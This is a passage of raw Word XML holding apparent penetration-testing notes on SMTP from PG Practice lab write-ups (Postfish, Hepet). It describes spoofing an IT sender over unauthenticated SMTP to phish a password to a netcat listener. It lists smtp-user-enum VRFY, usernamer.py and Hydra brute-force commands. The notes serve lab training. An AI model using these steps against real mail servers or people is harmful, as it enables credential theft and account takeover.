          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They crafted mail using SMTP but they made it scratch within SMTP without using tools like swaks or sendmail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002758">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Form this, they saw </w:t>
      </w:r>
      <w:hyperlink r:id="rId823">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">it@postfish.off</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was the one sending the email, and SMTP required no authentication, so they could send an email as </w:t>
      </w:r>
      <w:hyperlink r:id="rId824">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">it@postfish.off</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. And so they did and inside the email they used key words like "Password”, “Reset” and “Link” and put the URL of our own computer in the email to "change the password." This is because the email we got legit says that IT team will be sending links to reset password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002759">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1099"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then set up a listener on our IP for port 80 and when they clicked on the link, we got a POST request sent to our netcat listener which includes the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000275A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId825">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Postfish</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275B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027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5D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000275E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4a4puqout91s" w:id="347"/>
      <w:bookmarkEnd w:id="347"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMTP</w:t>
      </w:r>
    </w:p>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen on Port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">25 465 or 587</w:t>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t xml:space="preserve">Often interacted with through Telnet for enumeration, or when you are doing Phishing attacks using Swaks</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId826">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hepet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice does some good enumeration for SMTP since it was a phishing attack:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002765">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1348"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smtp-user-enum -M VRFY -U users.txt -t 192.168.134.140</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002766">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1348"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They then used the creds they found here to enumerate IMAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002767">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002768">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId827">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Postfish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice also has good smtp user enumeration and reading emails and sending phishing email using SMTP. They logged into POP3. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002769">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000276A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000276B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Test for valid SMTP usernames:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000276C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId828">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Postfish</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000276D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I recommend using usernamer.py to create a very versatile username list given your usernames as shown in the Postfish writeup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000276E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Like from Brian Moore, it creates: brian.moore, bmoore, etc. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000276F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example usage:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002770">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 usernamer.py -n 'brian moore' &gt;&gt; smtp_usernames.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002771">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 usernamer.py -n 'sarah lorem' &gt;&gt; smtp_usernames.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002772">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 usernamer.py -n 'claire madison' &gt;&gt; smtp_usernames.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002773">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python2 usernamer.py -n 'mike ross' &gt;&gt; smtp_usernames.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002774">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smtp-user-enum -M VRFY -D postfish.off -U smtp_usernames.txt -t 192.168.58.137</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002775">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smtp-user-enum </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Pentestmonkey’s tool for enumerating SMTP users. It sends crafted SMTP commands (VRFY, EXPN, RCPT TO, etc.) to test for valid accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002776">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-M VRFY </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ sets the mode to use the VRFY SMTP command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VRFY &lt;user&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">asks the server “does this user exist?”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002778">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the server responds positively, you know the user/mailbox exists.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002779">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-D postfish.off </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ sets the target domain name for building addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000277A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example: if the tool is testing user brian.moore, it queries VRFY brian.moore@postfish.off.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000277B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-U smtp_usernames.txt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ the file containing candidate usernames (one per line).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000277C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You built this file using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">usernamer.py </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for names like brian moore, sarah lorem, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000277D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">That script generates username variations like brian.moore, bmoore, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000277E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="932"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t 192.168.58.137 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ target mail server IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000277F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002780">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002781">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bruteforce SMTP using Hydra:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002782">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="811"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -L users.txt -P pass.txt smtp://target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002783">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002784">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002785">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002786">
